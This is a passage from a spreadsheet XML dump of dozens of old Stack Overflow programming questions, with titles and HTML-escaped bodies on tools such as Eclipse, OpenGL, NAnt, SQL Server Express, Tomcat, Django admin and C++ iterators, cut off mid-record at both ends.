&lt;p&gt;For example, in eclipse, if I don't type &lt;code&gt;this&lt;/code&gt; first, its &lt;strong&gt;intellisense&lt;/strong&gt; won't realize I want to look for locally scoped members. Also, the TAB to complete VS convention is drilled into my head, and &lt;em&gt;Eclipse&lt;/em&gt; is ENTER to complete, I could switch everything by hand but that would take hours, and I was hoping someone had some sort of theme or something that has already done it :)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is it possible to programmatically change a user's screen saver and/or desktop background?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have been asked to standardize the screen saver and desktop background used by everyone in my company and, aside from going around to each PC individually, I'm looking for a programmatic way to accomplish this.  I am not a systems admin, so have never crossed this bridge before.  It is also worth noting that most PCs are running Windows XP, however some are Windows Server 2003 and a few are Vista.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>OpenGL: How to do RGBA-&gt;RGBA blitting without changing destination alpha</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an OpenGL RGBA texture and I blit another RGBA texture onto it using a framebuffer object. The problem is that if I use the usual blend functions with 
&lt;code&gt;glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA), &lt;/code&gt;
the resulting blit causes the destination texture alpha to change, making it slightly transparent for places where alpha previously was 1. I would like the destination surface alpha never to change, but otherwise the effect on RGB values should be exactly like with &lt;code&gt;GL_SRC_ALPHA&lt;/code&gt; and &lt;code&gt;GL_ONE_MINUS_SRC_ALPHA&lt;/code&gt;. So the blend factor functions should be (As,As,As,0) and (1-As,1-As,1-As,1). How can I achieve that?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>nant: Can I extract the last directory in a path?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In Nant, I would like to be able to extract the last name of the directory in a path.&lt;br /&gt;
For example, we have the path 'c:\my_proj\source\test.my_dll\'&lt;/p&gt;
&lt;p&gt;I would like to pass in that path and extract 'test.my_dll'&lt;/p&gt;
&lt;p&gt;Is there a way to easily do this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Push or Pull? Turning keypresses into velocity for in-game vehicles</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Should I push keypresses to vehicles when they're pressed, or should vehicles pull keys pressed from the engine?&lt;/p&gt;
&lt;p&gt;I have a vehicle object, which has location, velocity and accelleration members (among other things) and an update method, during which it updates its location based on its velocity, and its vevlocity based on its accelleration.&lt;/p&gt;
&lt;p&gt;I have a game object which contains the game loop, which calls the update method on the vehicle.&lt;/p&gt;
&lt;p&gt;If the player controls the vehicle with the arrow keys, should a keypress set the accelleration (push) and a key-release clear the velocity, or should the vehicle ask the game-engine if the accellerate key is pressed (pull)?  I think a push would mean that the keyboard control module would need to know about vehicles, whereas pull would mean a vehicle needs to know specific keyboard controls.&lt;/p&gt;
&lt;p&gt;I think a related question would be something like: should all objects know about all other objects, or should there be a strict hierarchy, so objects can ask things / tell things to other objects up the tree, but not down (or vice-versa)?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Enhancing Performance in Real-Time Systems</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;First, I'd like to establish the acceptable end-to-end latency for a real-time system in the financial world is less than 200ms. Okay, here's what I'm after. In the design of real-time systems, there are "design patterns" (or techniques) that will increase the performance (i.e. reduce processing time, improve scalability, etc).&lt;/p&gt;
&lt;p&gt;An example of what I'm after is, the use of GUIDs instead of sequential numbers for allocation of primary keys. Rationale for GUIDs is that handlers have their own primary key generators without "consulting" each other. This allows for parallel processing to occur and permits scaling.&lt;/p&gt;
&lt;p&gt;Here're some more. I'll try and add to the list when able to.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The use of &lt;a href="http://en.wikipedia.org/wiki/Event_Driven_Architecture" rel="nofollow"&gt;event driven architecture (EDA)&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;Use of messaging queues to support EDA.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I bow to the collective wisdom of the community. Thanks heaps!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Java printf functionality for collections or arrays</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In python you can use a tuple in a formatted print statement and the tuple values are used at the indicated positions in the formatted string.  For example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;gt;&amp;gt;&amp;gt; a = (1,"Hello",7.2)
&amp;gt;&amp;gt;&amp;gt; print "these are the values %d, %s, %f" % a
these are the values 1, Hello, 7.200000
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is there some way to use any array or collection in a java printf statement in a similar way?&lt;/p&gt;
&lt;p&gt;I've looked at the &lt;a href="http://java.sun.com/javase/6/docs/api/java/util/Formatter.html#syntax" rel="nofollow"&gt;documentation&lt;/a&gt; and it appears to have built in support for some types like Calendar, but I don't see anything for collections.  &lt;/p&gt;
&lt;p&gt;If this isn't provided in java, is there any java idiom that would be used in a case like this where you are populating collections and then printing the values from many collections using one format string (other than just nested looping)?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I get the resolution of the main monitor in Mac OS X in C++?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a graphical app that needs to test the resolution of the display it is starting up on in Mac OS X to ensure it is not larger than the resolution.  This is done before the window itself is initialized.  &lt;/p&gt;
&lt;p&gt;If there is more than one display, it needs to be the primary display.  This is the display that hardware accelerated (OpenGL) apps will start up on in Full Screen, and is typically the display that has the menu bar at the top.&lt;/p&gt;
&lt;p&gt;In Windows, I can successfully use GetSystemMetrics().  How can I do this on OS X?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to programmatically simulate XP's "Windows Security" start menu option on Windows 2000</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to find a way to invoke the Ctrl+Alt+Delete dialog on a Windows 2000 computer that I'm connected to via Remote Desktop. Windows XP and 2003 include a new start menu command called "Windows Security" that does this, but Windows 2000 has no such option.&lt;/p&gt;
&lt;p&gt;It appears that Ctrl+Alt+End will do this, but it only goes to the outermost RDP window, so if you're several connections deep, it doesn't help. In this scenario, I'm on computer A, connected to computer B. From computer B, I connect to computer C. Pressing Ctrl+Alt+End opens the Ctrl+Alt+Delete dialog on computer B, not computer C.&lt;/p&gt;
&lt;p&gt;The goal here is to allow users connecting to computer C to change their own passwords. The users are not administrators on the computer, so they can't access the various tools that an admin might use to accomplish this.&lt;/p&gt;
&lt;p&gt;[edit] I forgot to make this a programming question; my intent was to figure out how to do this from code (although a non-code method would be useful as well).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Glassfish: Deploying application in domain failed; Error loading deployment descriptors - invalid bit length repeat</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to deploy a .war trough the server's web interface. Getting the same error when deploying it as an exploded directory with IDEA.
What is the solution to this problem?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Development with a tablet, not a mouse</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Lifehacker had a post a couple days ago asking people about &lt;a href="http://lifehacker.com/5054519/" rel="nofollow"&gt;the best mouse you've ever had&lt;/a&gt; and it appears some people have traded their mouse for a tablet.&lt;/p&gt;
&lt;p&gt;I'm curious if anyone here has traded their mouse in for a tablet?  Does it work well for development?  Looking for pros and cons from people who have tried it or are using it.&lt;/p&gt;
&lt;p&gt;Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Any reason to have SQL Server 2005 and 2008 installed on same machine?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm setting up a new development server and want to install the latest version of SQL Server 2008 Express.&lt;/p&gt;
&lt;p&gt;Will our existing sql2005 databases work with 2008 without modification?
  If so is there any reason to install both versions on the same server?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C++ versus D</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is the &lt;a href="http://www.digitalmars.com/d/"&gt;D language&lt;/a&gt; a credible alternative to Java and C++? What will it take to become a credible alternative? Should I bother learning it? Does it deserve evangelizing?&lt;/p&gt;
&lt;p&gt;The main reason I ask is that with the new c++ standard (c++0x) almost here, its clear to me that the language has gone well past the point of no return with respect to anyone ever understanding it. I know that c/c++ will never die but at some point we need to move on. Even COBOL had its day and Java has in many respects undone c++. So what's next? Does D fill the bill?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Anyone successfully using Commission Junction API?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is anyone successfully using the CJ web services? I just keep getting &lt;code&gt;java.lang.NullPointerException&lt;/code&gt;s even though my app is .net (clearly their errors). CJ support doesn't even know what a web service is. I googled and found many people getting this or other errors. Question is: is it a temporary problem or am I doomed to parse manually downloaded reports for eternity?&lt;/p&gt;
&lt;p&gt;The specific API I'm trying to use is the &lt;a href="http://help.cj.com/en/web_services/Publisher_Commission_Service.htm" rel="nofollow"&gt;daily publisher commission service&lt;/a&gt;. &lt;a href="https://pubcommission.api.cj.com/wsdl/version2/publisherCommissionService.wsdl" rel="nofollow"&gt;Here&lt;/a&gt; is the WSDL.&lt;/p&gt;
&lt;p&gt;Links:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="http://webservices.cj.com/" rel="nofollow"&gt;CJ web services home&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://help.cj.com/en/web_services/web_services.htm" rel="nofollow"&gt;API Reference&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>Can SQLExpress 2005 and 2008 be installed on same machine without issue?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to install SQLExpress2005 as an instance "SQLExpress"
and install SQLExpresss2008 as "SQLExpress2008" instance.&lt;/p&gt;
&lt;p&gt;Is there any problem with doing this on the same machine?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Search Engines Inexact Counting (about xxx results)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When you search in Google (i'm almost sure that Altavista did the same thing) it says "Results 1-10 of about xxxx"...&lt;/p&gt;
&lt;p&gt;This has always amazed me... What does it mean "about"?&lt;br /&gt;
How can they count roughly?&lt;br /&gt;
I do understand why they can't come up with a precise figure in a reasonable time, but how do they even reach this "approximate" one?&lt;/p&gt;
&lt;p&gt;I'm sure there's a lot of theory behind this one that I missed...&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Automatically adding specified text at beginning of files in VS 2008</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way to have Visual Studio 2008 automatically add heading information to files? For example, "Copyright 2008" or something along those lines. I've been digging through the options, but nothing seems to be jumping out at me.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Are there any free ways to turn an html page into an image with .net</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to take html, including the text and images and turn it into one image containing everything.  Is there a free way to do it?&lt;/p&gt;
&lt;p&gt;This is using .net 3.5.&lt;/p&gt;
&lt;h3&gt;See also:&lt;/h3&gt;
&lt;p&gt;&lt;a href="http://stackoverflow.com/questions/119116/server-generated-web-screenshots"&gt;Server Generated web screenshots?&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://stackoverflow.com/questions/65078/what-is-the-best-way-to-create-a-web-page-thumbnail"&gt;What is the best way to create a web page thumbnail?&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why doesn't C++ have a garbage collector?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm not asking this question because of the merits of garbage collection first of all.  My main reason for asking this is that I do know that Bjarne Stroustrup has said that C++ will have a garbage collector at some point in time.&lt;/p&gt;
&lt;p&gt;With that said, why hasn't it been added?  There are already some garbage collectors for C++.  Is this just one of those "easier said than done" type things?  Or are there other reasons it hasn't been added (and won't be added in C++11)?&lt;/p&gt;
&lt;p&gt;Cross links:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="http://stackoverflow.com/questions/81062/garbage-collectors-for-c"&gt;Garbage collectors for C++&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;EDIT:&lt;/strong&gt;  Just to clarify, I understand the reasons why C++ didn't have a garbage collector when it was first created.  I'm wondering why the collector can't be added in.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I reseed an identity column in a T-SQL table variable?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a T-SQL &lt;strong&gt;table variable&lt;/strong&gt; (not a table) which has an auto incrementing identity column. I want to clear all data from this variable and reset the identity column value to 1. How can this be done?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Ruby isPrime Method</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;pre&gt;&lt;code&gt;('1' * N) !~ /^1?$|^(11+?)\1+$/
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;On the net, I found this piece of Ruby code that works for N &gt;= 0 that determines whether or not N is a prime. From what I can tell, it looks like play with regex but I have no idea how it works. Could someone tell me how it works?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can I have non-measure codes mixed with measures in my fact table?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We're doing a complex bit of data accumulation.  Our customer sends us some stuff that includes two dimensions (time and a business unit).  Time is mostly year-month.  The business unit dimension has just a few attributes: a name, and a few categories to which BU's can belong for reporting and analysis purposes.&lt;/p&gt;
&lt;p&gt;The stuff they send us includes some current state information (dates and codes).  These seem fact-like.  They also send some information that characterizes the relationship with the business unit (mostly additional codes).  Again, these are unique to the business unit and time period.&lt;/p&gt;
&lt;p&gt;Finally, they send us stuff that is clearly additive facts.  It includes currency and counts that have proper units.&lt;/p&gt;
&lt;p&gt;Should I commingle this qualitative information in a single fact table with the additive facts?  Or should I separate the qualitative stuff (which can only be used with counts) from the quantitative stuff (which can be used with sum)?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the best way to set-up authentication in a tomcat webapp?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a self built JSP webapp and at the moment I'm using tomcats built in admin pannel to manage user accounts (that are stored in tomcats config xml files) but this is limited because i can not create new accounts from within the web-app (eg. I can not have a sign up website) and need to manually create the accounts. &lt;/p&gt;
&lt;p&gt;What is the most straight forward way of implementing accounts in a tomcat environment?&lt;/p&gt;
&lt;p&gt;dennis&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can you recommend a .cvsignore file for a Visual C#.NET solution?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've developed a Visual C#.NET 2008 Express Edition solution containing three projects. I am cleaning it up to commit it into a CVS repository.&lt;/p&gt;
&lt;p&gt;There are several files that are created during the build process that are not necessary to be placed in the repository since they will be regenerated automatically.&lt;/p&gt;
&lt;p&gt;The question: Can anyone suggest a list of patterns to be placed into a .cvsignore file so that these generated files and folders are ignored?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is it possible to include one CSS file in another?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possible to include one CSS file in another?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Real HLSL IDE/debugger</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Are there any IDE's for developing HLSL code?  The three key features I want are:&lt;br&gt;
1) syntax highlighting&lt;br&gt;
2) auto-complete&lt;br&gt;
3) interaction debugging&lt;/p&gt;
&lt;p&gt;Visual Studio doesn't do any of these things, and it doesn't seem that RenderMonkey or FX Composer do either.&lt;/p&gt;
&lt;p&gt;Is there some IDE that I'm not aware of, or does one of these three IDE's actually support these features and I'm too clueless to figure out how to use them properly?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Debug Pylons application through Eclipse</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have Eclipse setup with PyDev and love being able to debug my scripts/apps.  I've just started playing around with Pylons and was wondering if there is a way to start up the paster server through Eclipse so I can debug my webapp?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Get list of available servers in SQL server group</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can I extract the list of available SQL servers in an SQL server group? I'm planning to put that list in a combo box in VB.NET.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>When using ANT, how can I define a task only if I have some specific java version?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have the problem that an specific step in Ant can only be executed when we have Java 1.5 installed in the build computer.  The task definition uses  uses a jar file that was compiled using 1.5, so running with a 1.4 virtual machine will throw an IncompatibleClassVersion exception.&lt;/p&gt;
&lt;p&gt;I have to find a solution meanwhile to have this task working for this specific project that requires 1.4, but a question came to me.  How can I avoid defining this task and executing this optional step if I don't have a specific java version?&lt;/p&gt;
&lt;p&gt;I could use the "if" or "unless" tags on the target tag, but those only check if a property is set or not.  I also would like to have a solution that doesn't require extra libraries, but I don't know if the build-in functionality in standard is enough to perform such a task.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to check the overall health of database using Toad?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Anyone have any idea? And any open source sofware which also seens to perform this kind of functionality?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can you create collapsible #Region like scopes in C++ within VS 2008?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I miss it so much (used it a lot in C#). can you do it in C++?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to get WCF statistics from inside an application that uses it?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possible to gather performance statistics programmatically from inside a WCF application? For example, the number of connections open or requests received.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I plot data with a non-numeric X-axis?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a series of performance tests I would like to show as a graph.  I have a set of tests (about 10) which I run on a set of components (currently 3), and get throughput results.&lt;/p&gt;
&lt;p&gt;The Y-axis would be the throughput result from the test, and the X-axis should have an abbreviated name of the test, with the results from the various components I'm testing.  So, for each X label (eg. retrieve20Items, store20Items) there would be 3 different results above it, one for each of the three components I'm testing, each colour-coded and referenced in the legend.&lt;/p&gt;
&lt;p&gt;Is this non-numeric x-axis something that I can do with gnuplot?  This is being done on a linux platform, so Windows-only tools won't work for me.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I peek at the first two bytes in an InputStream?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Should be pretty simple: I have an InputStream where I want to peek at (not read) the first two bytes, i.e. I want the "current position" of the InputStream to stil be at 0 after my peeking. What is the best and safest way to do this?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Answer&lt;/strong&gt; - As I had suspected, the solution was to wrap it in a BufferedInputStream which offers markability. Thanks Rasmus.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SQL2005 Express slow from remote VB6 application</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a legacy VB6 application that was built using MSDE.&lt;/p&gt;
&lt;p&gt;As many client's database grow towards the MSDE 2 GB limit they are upgraded to SQL 2005 Express.&lt;/p&gt;
&lt;p&gt;This has proven very successful until today.&lt;/p&gt;
&lt;p&gt;I have spent the entire day troubleshooting a client's network on which our application runs unacceptably slowly, when connecting the a SQL 2005 Express named instance across the "network".  &lt;/p&gt;
&lt;p&gt;I say "network" because it is only two XP SP2 machines - there is no dedicated server here. No AD.&lt;/p&gt;
&lt;p&gt;In trying to isolate this problem I have installed SQL 2005 Express on both machines and placed copies of our database on both machines. I have even completely reinstalled our application using the SQL2005 Express install routine we now have. It makes no difference whether I restore an old MSDE database or use a newly created SQL 2005 Express one.&lt;/p&gt;
&lt;p&gt;When running our application and connecting to either machine's local server performance is fine. Once you connect our application on either PC to the server on the other PC, it is unworkably slow. (Regardless of the combination).&lt;/p&gt;
&lt;p&gt;Now, I have rebuilt statistics (exec sp_updatestats), rebuilt ALL indexes, disabled (temporarily) firewalls and virus software and clutched and countless other straws.&lt;/p&gt;
&lt;p&gt;I have resorted to running FileMon and ProcessMon on both machines and have even written a little test application to simply connect and query a table in the database. It too runs slowly - (takes about 5 - 6 seconds to connect).&lt;/p&gt;
&lt;p&gt;The monitors (File and Process) show delays when SQL Server is writing to a log file (c:\program files\microsoft sql server\mssql.1\log files\log_12.trc).&lt;/p&gt;
&lt;p&gt;Other tools though, like SQL Management Studio Express and even SSEUtil (a SQL Server Express Diagnostic Utility I found) run perfectly when connecting from the client to the server. Queries (even large ones) run as you would expect.&lt;/p&gt;
&lt;p&gt;I feel sure this problem is environmental as we have so many sites running what would appear to be the same setup, with no such problems.&lt;/p&gt;
&lt;p&gt;Can someone tell me what I should be doing to isolate this problem or even offer any clues or suggestions that could help solve this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>how to register url handler for apache commons httpclient</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to be able to access custom URLs with apache httpclient. Something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;HttpClient client = new HttpClient();
HttpMethod method = new GetMethod("media:///squishy.jpg");
int statusCode = client.executeMethod(method);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Can I somehow register a custom URL handler? Or should I just register one with Java, using&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;URL.setURLStreamHandlerFactory(...)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Regards.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Entlib versus ACA.Net - Does ACA.Net provide any advantage?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My understanding is that Entlib has picked-up and included concepts from ACA.Net.  Is there any point to using ACA.Net on a new .net project?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>NoClassDefFoundError with a long classname on Tomcat with java 1.4.2_07-b05</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a java class:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;it.eng.ancona.view.RuoliView$TabElaborazioneFattureValidazione$ElencoDettaglioElaborazioneFattureValidazione$RigaElencoDettaglioElaborazioneFattureValidazione&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;It's so long for multiple inner class.&lt;/p&gt;
&lt;p&gt;If I use 1.4.2_07-b05 on Eclipse and I call this class, all goes fine.&lt;/p&gt;
&lt;p&gt;If I use 1.4.2_07-b05 on Tomcat 5.0 it throws &lt;code&gt;NoClassDefFoundError&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;I try to cut the class name, and after this all works fine.&lt;/p&gt;
&lt;p&gt;I've searched the internet and I've found that the max length for a class name is 65000, so the length should be ok. And on eclipse all works.&lt;/p&gt;
&lt;p&gt;The OS is Vista.&lt;/p&gt;
&lt;p&gt;Someone know if it's a bug or anything else?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Creating my own Iterators</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to learn C++ so forgive me if this question demonstrates a lack of basic knowledge, you see, the fact is, I have a lack of basic knowledge.&lt;/p&gt;
&lt;p&gt;I want some help working out how to create an iterator for a class I have created.&lt;/p&gt;
&lt;p&gt;I have a class 'Shape' which has a container of Points. 
I have a class 'Piece' which references a Shape and defines a position for the Shape.
Piece does not have a Shape it just references a Shape.&lt;/p&gt;
&lt;p&gt;I want it to seem like Piece is a container of Points which are the same as those of the Shape it references but with the offset of the Piece's position added.&lt;/p&gt;
&lt;p&gt;I want to be able to iterate through the Piece's Points just as if Piece was a container itself. I've done a little reading around and haven't found anything which has helped me. I would be very grateful for any pointers.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Using pre-compiled headers with CMake</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have seen a few (old) posts on the 'net about hacking together some support for pre-compiled headers in CMake. They all seem a bit all-over the place and everyone has their own way of doing it. What is the best way of doing it currently?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why is the fact that Microsoft decided to support jQuery such a big deal?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I don't see what all this fuss is about Microsoft's decision to support JQuery within ASP.NET MVC.&lt;/p&gt;
&lt;p&gt;There were signs that open-minded people are starting to have some say in the matters of marketing for a while now. And even the way MS does business has started to change. But at it's core it's still acting in response to customers' requests.&lt;/p&gt;
&lt;p&gt;I for one don't know what to make of it, except that it brings back to Microsoft's sphere of influence a very visible product.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the impact of having namespaces in multiple DLLs?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've inherited a VB.net project that generates 2 DLLS: one for the web app, and another for the "business layer".  This is for a sub-app of a larger web site. (Using VS2005).&lt;/p&gt;
&lt;p&gt;The problem is that that something doesn't smell right with the DLL &amp;amp; namespace structure, and I'd like to know if there are any performance impacts.&lt;/p&gt;
&lt;p&gt;The main web app is "Foo", and generates Foo.dll.  Foo.dll contains namespace App.Foo, which contains the classes for all the pages, user controls, etc.&lt;/p&gt;
&lt;p&gt;There's also a project "FooLib" that generates FooLib.dll.  FooLib.dll also contains an App.Foo namespace, which contains a bunch of class definitions.  There are a few other namespaces like App.Foo.Data, App.Foo.Logic, etc.&lt;/p&gt;
&lt;p&gt;Is there anything wrong with this?  How does the runtime find a class across multiple DLLs?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a way to define which fields in the model are editable in the admin app?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Assume the following:&lt;/p&gt;
&lt;p&gt;&lt;em&gt;models.py&lt;/em&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class Entry(models.Model):
    title = models.CharField(max_length=50)
    slug = models.CharField(max_length=50, unique=True)
    body = models.CharField(max_length=200)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;em&gt;admin.py&lt;/em&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class EntryAdmin(admin.ModelAdmin):
    prepopulated_fields = {'slug':('title',)}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I want the slug to be pre-populated by the title, but I dont want the user to be able to edit it from the admin. I assumed that adding the fields=[] to the admin object and not including the slug would have worked, but it didnt. I also tried setting editable=False in the model, but that also didnt work (infact, stops the page from rendering).&lt;/p&gt;
&lt;p&gt;Thoughts? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are your favorite Ruby on Rails books and why?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking to pick up a few books on RoR to help teach myself how to build a scalable RoR app. 
I have read the RailsSpace book, and am starting the Rails Way book tonight. &lt;/p&gt;
&lt;p&gt;Some topics of interest are:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;REST - considering using Amazon's SimpleDB&lt;/li&gt;
&lt;li&gt;Using RSpec effectively&lt;/li&gt;
&lt;li&gt;memcached - server architecture and code implementation&lt;/li&gt;
&lt;li&gt;mongrel - server architecture&lt;/li&gt;
&lt;li&gt;MySQL&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>Request.UrlReferrer null?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In an aspx C#.NET page (I am running framework v3.5), I need to know where the user came from since they cannot view pages without logging in.  If I have page &lt;code&gt;A&lt;/code&gt; (the page the user wants to view) redirect to page &lt;code&gt;B&lt;/code&gt; (the login page), the Request.UrlReferrer object is null.  &lt;/p&gt;
&lt;p&gt;Background: If a user isn't logged in, I redirect to the Login page (&lt;code&gt;B&lt;/code&gt; in this scenario).  After login, I would like to return them to the page they were requesting before they were forced to log in.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;UPDATE:&lt;/strong&gt; 
&lt;br /&gt;A nice quick solution seems to be:
&lt;br /&gt;&lt;code&gt;//if user not logged in 
Response.Redirect("..MyLoginPage.aspx?returnUrl=" + Request.ServerVariables["SCRIPT_NAME"]);&lt;/code&gt;
&lt;br /&gt;Then, just look at QueryString on login page you forced them to and put the user where they were after successful login.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can we create an application with its own Web.config and Forms Authentication section inside another application using Forms Authentication?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an application that uses Forms Authentication to authenticate one type of user. There is a section in this application that needs to be authenticated for another type of user using a different table in the database. The problem happens if the second type of user's session times out, she is taken to the login page defined in the Forms Authentication section of the main Web.Config instead of the login page for the second type of user. I am looking for solutions to this problem. One idea is to create an application in IIS for the section and create a Web.Config for the folder and add another Forms Authentication section. In my experiments, it seems this doesn't work. Am I missing something obvious? Any insights? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>AVI Animations for GUI</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to get some AVI animations for use with the Borland VCL TAnimate component, to display during operations such as 'online update', 'burning cd' and a few others.&lt;/p&gt;
&lt;p&gt;I have only come across the &lt;a href="http://www.glyfx.com/shop/detail/animationpack/" rel="nofollow"&gt;glyFX Animation Pack&lt;/a&gt; so far.&lt;/p&gt;
&lt;p&gt;Can anybody recomend other places to get nice avi animations?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Prevent Text Wrap in DataGrid</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a problem with a data-bound DataGrid control, in that despite each column having its Wrap property set to false, the text still wraps.  It seems to only do this on IE, and not FF.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Dynamic Sorting within SQL Stored Procedures</t>
  </si>
  <si>
